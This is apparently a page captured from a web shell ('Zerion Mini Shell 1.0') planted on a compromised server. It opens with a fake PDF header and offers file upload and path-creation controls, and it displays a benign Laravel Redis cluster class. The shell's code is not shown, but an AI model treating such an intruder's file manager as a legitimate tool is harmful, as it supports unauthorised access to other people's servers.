%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /home/silvzytp/crm-dub-code/vendor/laravel/framework/src/Illuminate/Redis/Connections/
Upload File :
Create Path :
Current File : //home/silvzytp/crm-dub-code/vendor/laravel/framework/src/Illuminate/Redis/Connections/PredisClusterConnection.php

<?php

namespace Illuminate\Redis\Connections;

use Predis\Command\ServerFlushDatabase;

class PredisClusterConnection extends PredisConnection
{
    /**
     * Flush the selected Redis database on all cluster nodes.
     *
     * @return void
     */
    public function flushdb()
    {
        $this->client->executeCommandOnNodes(
            tap(new ServerFlushDatabase)->setArguments(func_get_args())
        );
    }
}

Zerion Mini Shell 1.0